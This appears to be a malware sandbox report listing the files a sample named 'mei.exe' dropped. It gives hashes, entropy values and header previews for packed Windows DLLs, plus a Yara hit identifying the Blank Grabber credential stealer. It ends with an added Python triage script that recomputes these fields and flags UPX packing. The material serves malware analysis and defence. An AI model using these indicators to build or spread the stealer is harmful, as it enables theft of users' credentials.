                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:HptnWm5CVWyhW+U8JIYiaHZ8ZpH3GCJEW0yPFIwbD:HptnWm5C/kYiQZiRBERCFND
                                                                                                                                                                    MD5:65D46C48252F9F51685C3ED011A9884B
                                                                                                                                                                    SHA1:024FB899C57EF679DDF2764AAD8DF65A5C026688
                                                                                                                                                                    SHA-256:FC59E7A7CBC98AA47655DF33728919A4C14FAF593368AD21E5E1FB0F09CB6CCE
                                                                                                                                                                    SHA-512:CC50A779961DB8444B5AD9E45A378FC66D84F64CC5E3E6D31537542998C37B3E440A9585803159A1EA4390D2CFE29F314096F9496527575846944BA5CEC53E48
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...2............." .........0...............................................@............`A.........................................................0...............0...)..............p............................................................................rdata..0...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):22920
                                                                                                                                                                    Entropy (8bit):5.115545906419277
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:lLNWyhWoU8JIYiaHZ8ZpH3GCJEmyh3AN4G:lHiYiQZiRBEmael
                                                                                                                                                                    MD5:D6C812262A9F85E4766B1CBF7E5B805B
                                                                                                                                                                    SHA1:307608CCBBBAB4CBB08867CA9E67993598ADADA3
                                                                                                                                                                    SHA-256:D3C96F9DFE7A3B1F22B6A6AB11779E8A42E77D986B331CAEFA1435FDBAA2C358
                                                                                                                                                                    SHA-512:3D394D2F4C637E12B092BD2A6FFF6D0233ABCDFC3E609DD30600D99B2582F7C12D15AF6D4D46733E639DB0ECC57F21D55CE08ED47FEC2E1E48CFB0B6C7A36BC2
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...."]..........." .........0...............................................@......9(....`A.........................................................0...............0...)..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):22920
                                                                                                                                                                    Entropy (8bit):5.076064551255853
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:UWyhWjOU8JIYiaHZ8ZpH3GCJEvyFD9n0q:kYYiQZiRBEvCD90q
                                                                                                                                                                    MD5:7743661702EF760FA8E5D41E32FD8D1F
                                                                                                                                                                    SHA1:5D364CC2BD3E301ED62B9068C23D1D8A0103E052
                                                                                                                                                                    SHA-256:4CB91250129F9E90E89F0EB429387BA4896789B18BE4A47BFBE94EAE64976D74
                                                                                                                                                                    SHA-512:D6AEDA9CD5E0C3B7AD3E658EF3D8381EC506B5CCCDB6476F25B79BEC27FD283A680F711DE2EB01449DCA0C36C7770707F1A2F3C8D2B184E78A924214DDD559BA
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...6..q.........." .........0...............................................@............`A............................................e............0...............0...)..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):31112
                                                                                                                                                                    Entropy (8bit):5.3249825040949625
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:P7yaFM4Oe59Ckb1hgmL5WyhWSU8JIYiaHZ8ZpH3GCJEYDy9X5:jFMq59Bb1jrYYiQZiRBEYDgJ
                                                                                                                                                                    MD5:D9A8DDA1433C0C990475D7927A0B57DE
                                                                                                                                                                    SHA1:C79BC530CD6273275C9641EB7147743BFB410A5F
                                                                                                                                                                    SHA-256:0160BBF3762F1116DFC039162CD94B82FCF61BCDAAC9E8161FBE763E68EBF489
                                                                                                                                                                    SHA-512:056190EDBCA8BE91C0AE7C8BC1B07E38A3FF906033DD42B863A424AED23D136A8D9A63BB33FAF6986D1C6560D4D52A14EDE4697AE75BBB2BF5A336936606B5E9
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d................" .........P...............................................`............`A.............................................%...........P...............P...)..............p............................................................................rdata...'.......0..................@..@.data........@......................@....rsrc........P.......@..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):22920
                                                                                                                                                                    Entropy (8bit):5.1300184563064715
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:IeXrqjd7tWyhW/gUSwv7s8jtGBIYiYF8oDbnPZ2oEhZnpH3GCwgEfFy0G1FwGj:I4rcWyhW4U8JIYiaHZ8ZpH3GCJEdy0GH
                                                                                                                                                                    MD5:D59D798EFEB82583664573B4C275940D
                                                                                                                                                                    SHA1:CA9650245C27AB3B795CCC21EE5B5FB948FD16CC
                                                                                                                                                                    SHA-256:859A0F16A6B01AF35F4ECCAA4CE383C98DFDFC9D9903EC2F35BA5CDE44983924
                                                                                                                                                                    SHA-512:9135539A869C0FDD0591F4D51DB37017A086277A9D9BB47C4B08827A7030B5DCA48103D8C9751D279FC657F53FB80BD205C83C97883FB2D45150288FDA6843F4
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...<SdT.........." .........0...............................................@......'.....`A............................................x............0...............0...)..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):27016
                                                                                                                                                                    Entropy (8bit):5.237414281586572
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:7ysyr7/WyhWZU8JIYiaHZ8ZpH3GCJEZyTqeBKiV8n:e3r7NlYiQZiRBEZVqGn
                                                                                                                                                                    MD5:98403AB797B6FB1085406D0880C58669
                                                                                                                                                                    SHA1:991731FF971D87DC7FACBBFE4EF275FBC2EB28AC
                                                                                                                                                                    SHA-256:43DAB57BBE95B15272261849E3285B2359394DE2A4C2A5B0B44834D35125764A
                                                                                                                                                                    SHA-512:2005122AB469F866761CCE8B61078C39F718947EBC51FCEE5AC33DF43C97F7BAB37A7943F30535FDEA6C310A22BA2D6270BAFE30FDDE4A7A22C71713615C96A6
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....TR.........." .........@...............................................P............`A............................................4............@...............@...)..............p............................................................................rdata........... ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):27016
                                                                                                                                                                    Entropy (8bit):5.498827388028231
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:rV2oFVhzWyhWEU8JIYiaHZ8ZpH3GCJEdyZZqj:rZ/WYiQZiRBEd0A
                                                                                                                                                                    MD5:7B7F4EAB1E000B458D3A8D9D82208B16
                                                                                                                                                                    SHA1:3CE4A5179C26317D31B27FB1F9A88CB3C11DA56D
                                                                                                                                                                    SHA-256:0FAB6F7DD517D084A05CF39D63C21B047148A82A5C884A62A04FAFF8AF3E8DCC
                                                                                                                                                                    SHA-512:CAC0097BDD0B285E2DDC1018B53639C44748C7371DE3919D2B8F0AA78C8A71B9D943E4A4084F70AD83D72FD52816F8206211A0C0F237C2E5BA29963A46EA17B8
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...k. U.........." .........@...............................................P......`.....`A............................................a............@...............@...)..............p............................................................................rdata........... ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):27016
                                                                                                                                                                    Entropy (8bit):5.488027299169383
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:uCV5yguNvZ5VQgx3SbwA71IkFyIYiQZiRBEyY/Stk:J5yguNvZ5VQgx3SbwA71IxI7ciDi/Stk
                                                                                                                                                                    MD5:66082DD6787E553A840310C8F8B0E4A8
                                                                                                                                                                    SHA1:56EA74E25BE107C51E01BB1023B8F3A708D913FA
                                                                                                                                                                    SHA-256:047EF4E4A2A8991CFE3C443F068F8184D2A0A18DFD0545300CF46B93E8886113
                                                                                                                                                                    SHA-512:0977F76658FD38A3487BA7B444189FD4AEDC20CAC4729CD13A03D86B4B252F347476CE4A3152F54BE3C2FAA8D60AE2AD3B0572899F569DA6612E9A3C7FF72DAA
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.... .h.........." .........@...............................................P............`A.........................................................@...............@...)..............p............................................................................rdata.._........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):22920
                                                                                                                                                                    Entropy (8bit):5.480527288691285
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:m43hwDyWyhWLUSwv7s8jtGBIYiYF8oDbnPZ2oEhZnpH3GCwgEfhTycy7abKp/0y:JWyhWLU8JIYiaHZ8ZpH3GCJEZy/7MKh
                                                                                                                                                                    MD5:44B22D07687C5241B8F4D0E51B7C04B4
                                                                                                                                                                    SHA1:4CEA2309F61ED3FC73B782259EA3BDCA4264F935
                                                                                                                                                                    SHA-256:27961196048277AD6836DFD80307CE1334BC921D661C35576BC86858DC24CDF4
                                                                                                                                                                    SHA-512:50689E4361457779A7CAEFCB85C8193065C81CC5959FDDDCE175F41CA777931C7591AD01D714EBDCF8FAB8622F2A8F53F51FDB5FB028992CB6D30FEA8D39F580
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...G............" .........0...............................................@............`A.........................................................0...............0...)..............p............................................................................rdata..=...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):22920
                                                                                                                                                                    Entropy (8bit):5.059390570888982
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:F/fHQduHWyhWRUSwv7s8jtGBIYiYF8oDbnPZ2oEhZnpH3GCwgEf5yvTKC:F/fRWyhWRU8JIYiaHZ8ZpH3GCJEByeC
                                                                                                                                                                    MD5:CBB06D1DC02E5EC16771EDB3E6E42890
                                                                                                                                                                    SHA1:952711529980A8F4A01F79849E4A6E57A0AA098A
                                                                                                                                                                    SHA-256:38B77CD742DA9542B3527D71C35A8E44991A17F6222C85A2E9EFCA9E5E477787
                                                                                                                                                                    SHA-512:399D8DC46E78CA25FFADF1D7270C7C63B28CA98FC27ACCDA152608DF1A23343D6CE844B3A284B93EF0BE64BC736A4B6239805EF4DBFE5675E30CEC7AE33B7BAE
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...2............." .........0...............................................@......'.....`A............................................^............0...............0...)..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1440734
                                                                                                                                                                    Entropy (8bit):5.590383253842785
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:mQR5pATG8/R5lUKdcubgAnyfb8h30iwhBdYf9PfeYHHc:mQR5pE/RbPu
                                                                                                                                                                    MD5:D220B7E359810266FE6885A169448FA0
                                                                                                                                                                    SHA1:556728B326318B992B0DEF059ECA239EB14BA198
                                                                                                                                                                    SHA-256:CA40732F885379489D75A2DEC8EB68A7CCE024F7302DD86D63F075E2745A1E7D
                                                                                                                                                                    SHA-512:8F802C2E717B0CB47C3EEEA990FFA0214F17D00C79CE65A0C0824A4F095BDE9A3D9D85EFB38F8F2535E703476CB6F379195565761A0B1D738D045D7BB2C0B542
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:PK..........!.h%..b...b......._collections_abc.pyc............................................d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.........................Z...e.d...............Z.d...Z...e.e...............Z.[.g.d...Z.d.Z...e...e.d.............................Z...e...e...e...........................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.g.............................Z...e...e...e.g...........................................Z...e...e...e.d...........................................Z...e...e...e.d.d.z.............................................Z...e...e...e...........................................Z...e...e.d.............................Z ..e...e.d.............................Z!..e...e...e"..........................................Z#..e.i.......................................
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):124579
                                                                                                                                                                    Entropy (8bit):7.606926497803956
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:4YpNNk2TdLmflt6e7YlrfvC+M3sKI2mJiKdV0HU6Q:hHdKfT69XCx3sKI2mJCU6Q
                                                                                                                                                                    MD5:07101800E0EE631A87738C9F9F81A1D5
                                                                                                                                                                    SHA1:0E837535C7768D748BC04A13A9EC397C48D7AE4F
                                                                                                                                                                    SHA-256:FAE8C9B6B5F67E9CD3496019DA6E0ED28442FD799354F9575ADD41599C4DFCBF
                                                                                                                                                                    SHA-512:6B4A96E6981C591EE83D2842C69D820DF90D83EC3A10F28F73BD0D4AF55297FE56DC2E27426378F5879CFCCF476E02F32F56CD1CD324E00B2561DEE0F5AC1F30
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:PK........7C.W..g-...-.......stub-o.pyc........Z.ne..........................j.......e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.................................................................
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1629464
                                                                                                                                                                    Entropy (8bit):7.952620301087112
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:AMyDwbv70aKbP1zkLO5YHLA1CPwDvt3uFlDCZ:kwbv77KbPaqYHLA1CPwDvt3uFlDCZ
                                                                                                                                                                    MD5:27515B5BB912701ABB4DFAD186B1DA1F
                                                                                                                                                                    SHA1:3FCC7E9C909B8D46A2566FB3B1405A1C1E54D411
                                                                                                                                                                    SHA-256:FE80BD2568F8628032921FE7107BD611257FF64C679C6386EF24BA25271B348A
                                                                                                                                                                    SHA-512:087DFDEDE2A2E6EDB3131F4FDE2C4DF25161BEE9578247CE5EC2BCE03E17834898EB8D18D1C694E4A8C5554AD41392D957E750239D3684A51A19993D3F32613C
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./',.kFB.kFB.kFB.b>..yFB..:C.iFB..:G.gFB..:F.cFB..:A.oFB.kFC..FB. >C.`FB.;A.KFB.;F..EB.;B.jFB.;..jFB.;@.jFB.RichkFB.........................PE..d...x..e.........." ...#. .......`9.0{O..p9.................................. R...........`......................................... .O......O.h.....O.......K.\.............R.......................................O.@...........................................UPX0.....`9.............................UPX1..... ...p9.....................@....rsrc.........O.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):29968
                                                                                                                                                                    Entropy (8bit):7.677818197322094
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
                                                                                                                                                                    MD5:08B000C3D990BC018FCB91A1E175E06E
                                                                                                                                                                    SHA1:BD0CE09BB3414D11C91316113C2BECFFF0862D0D
                                                                                                                                                                    SHA-256:135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
                                                                                                                                                                    SHA-512:8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
Process:C:\Users\user\Desktop\mei.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):229144
Entropy (8bit):7.930038440560372
Encrypted:false
SSDEEP:3072:SFfmvsqWLSCMT+MyN6Qp2oZqpN+/fvrqknqbf6CjaBGkfPkZAK1ck2kBVfLwOmFd:SFevsT9JN+vyH1nqLr3CPrYBBRcd
MD5:6EDA5A055B164E5E798429DCD94F5B88
SHA1:2C5494379D1EFE6B0A101801E09F10A7CB82DBE9
SHA-256:377DA6175C8A3815D164561350AE1DF22E024BC84C55AE5D2583B51DFD0A19A8
SHA-512:74283B4051751F9E4FD0F4B92CA4B953226C155FE4730D737D7CE41A563D6F212DA770E96506D1713D8327D6FEF94BAE4528336EBCFB07E779DE0E0F0CB31F2E
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T..T..T..].3.Z....V......V....X....\....P....W..T..I....e....U.._.U....U..RichT..........PE..d......e.........." ...#.....P...p...r....................................................`............................................,C......8............ ..pM...................................................~..@...........................................UPX0.....p..............................UPX1................................@....rsrc....P.......L..................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

Process:C:\Users\user\Desktop\mei.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1705240
Entropy (8bit):7.993600008484676
Encrypted:true
SSDEEP:24576:qJY99sOZi/8N8C1CSIJyR4ZRE1Rqq/uQivcHe2Bg5Cmek5CP7uP6zohpLGLZFkh2:FjZiEN8p6ivZUHe2BgcpP7uaor6
MD5:0B66C50E563D74188A1E96D6617261E8
SHA1:CFD778B3794B4938E584078CBFAC0747A8916D9E
SHA-256:02C665F77DB6B255FC62F978AEDBE2092B7EF1926836290DA68FD838DBF2A9F2
SHA-512:37D710CB5C0CEB5957D11B61684CFBC65951C1D40AB560F3F3CB8FECA42F9D43BD981A0FF44C3CB7562779264F18116723457E79E0E23852D7638B1A954A258F
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......... ..qN.qN.qN.$.O.qN.$...qN.$.K.qN.$.J.qN.$.M.qN....qN...O.qN.qO..pN.B.C.]qN.B.N.qN.B...qN.B.L.qN.Rich.qN.........PE..d......e.........." ...#..........D...]...D...................................^...........`.........................................H.].......].......].......V../..........(.^.......................................].@...........................................UPX0......D.............................UPX1..........D.....................@....rsrc.........].....................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

Process:C:\Users\user\Desktop\mei.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):630736
Entropy (8bit):6.409476333013752
Encrypted:false
SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
MD5:9C223575AE5B9544BC3D69AC6364F75E
SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................

Process:C:\Users\user\Desktop\mei.exe
File Type:ASCII text
Category:dropped
Size (bytes):456
Entropy (8bit):4.447296373872587
Encrypted:false
SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
MD5:4531984CAD7DACF24C086830068C4ABE
SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
Malicious:true
Yara Hits:
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rarreg.key, Author: Joe Security
Reputation:unknown
Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.

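Added example (not Joe Sandbox code and not part of the original report): a small Python triage helper that recomputes, for any dropped file on disk or in memory, the fields these records print (size, 8-bit entropy, MD5/SHA1/SHA-256/SHA-512) and recognises the two artefact kinds that dominate this report: PE DLLs whose section table has been renamed to UPX0/UPX1 (visible in the previews above, together with the "4.02.UPX!" trailer), and a dropped WinRAR registration file, which starts with "RAR registration data" and is what the Yara rule hit on. The entropy cut-off used for the "Encrypted" flag is an assumption chosen to agree with the records above (7.9936 flagged, 7.9868 not), not the sandbox's documented rule; the sample PE skeleton and the registration-file text in the block are constructed inputs, not the dropped files.

```python
"""Recompute sandbox-style dropped-file fields and flag UPX-packed PEs and rarreg.key."""
import hashlib
import math
import struct
from collections import Counter

# Assumption: the report does not document how "Encrypted" is derived. A near-maximal
# entropy threshold matches the records above (7.9936 -> true, 7.9868 -> false).
ENTROPY_ENCRYPTED_THRESHOLD = 7.99


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, 0.0 (constant) to 8.0 (uniform)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def file_hashes(data: bytes) -> dict:
    """Upper-case hex digests, in the same order the report lists them."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def pe_section_names(data: bytes) -> list:
    """Walk MZ -> e_lfanew -> 'PE\\0\\0' -> COFF header -> section table.
    Returns the section names, or [] for anything that is not a parseable PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return []
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return []
    coff = e_lfanew + 4
    if coff + 20 > len(data):
        return []
    (num_sections,) = struct.unpack_from("<H", data, coff + 2)   # NumberOfSections
    (opt_size,) = struct.unpack_from("<H", data, coff + 16)      # SizeOfOptionalHeader
    table = coff + 20 + opt_size
    names = []
    for i in range(num_sections):
        off = table + i * 40                                     # IMAGE_SECTION_HEADER
        if off + 40 > len(data):
            break
        names.append(data[off:off + 8].rstrip(b"\0").decode("ascii", "replace"))
    return names


def is_upx_packed(section_names) -> bool:
    """UPX rewrites the section table to UPX0/UPX1 (and UPX2 when it keeps a third)."""
    return any(n.startswith("UPX") for n in section_names)


def _looks_textual(data: bytes) -> bool:
    return bool(data) and all(32 <= b < 127 or b in (9, 10, 13) for b in data)


def triage(data: bytes) -> dict:
    """One record with the same fields the sandbox prints per dropped file."""
    ent = shannon_entropy(data)
    rec = {"size": len(data), "entropy": ent,
           "encrypted": ent >= ENTROPY_ENCRYPTED_THRESHOLD, **file_hashes(data)}
    sections = pe_section_names(data)
    if sections:
        rec.update(file_type="PE", sections=sections, upx_packed=is_upx_packed(sections))
    else:
        rec.update(file_type="text" if _looks_textual(data) else "data",
                   rar_license=data.startswith(b"RAR registration data"))
    return rec


# ---- constructed samples; these are NOT the files from the report ----------------
def build_sample_pe(section_names, opt_size=240) -> bytes:
    """Minimal PE32+ skeleton: DOS stub, PE signature, COFF header, zeroed optional
    header, section table. Enough for the parser above, not a loadable image."""
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)
    coff = struct.pack("<HHIIIHH", 0x8664, len(section_names), 0, 0, 0, opt_size, 0x2022)
    opt = struct.pack("<H", 0x20B).ljust(opt_size, b"\0")        # PE32+ magic, rest zero
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", n.encode().ljust(8, b"\0"), 0, 0, 0, 0, 0, 0, 0, 0, 0)
        for n in section_names)
    return dos + b"PE\0\0" + coff + opt + table


UPX_SAMPLE = build_sample_pe(["UPX0", "UPX1", ".rsrc"])          # constructed
RARREG_SAMPLE = (b"RAR registration data\r\nExample Org\r\nSingle PC usage license\r\n"
                 b"UID=00000000000000000000\r\n")                  # constructed placeholder

if __name__ == "__main__":
    for name, blob in (("upx_sample.dll", UPX_SAMPLE), ("rarreg.key", RARREG_SAMPLE)):
        print(name, triage(blob))
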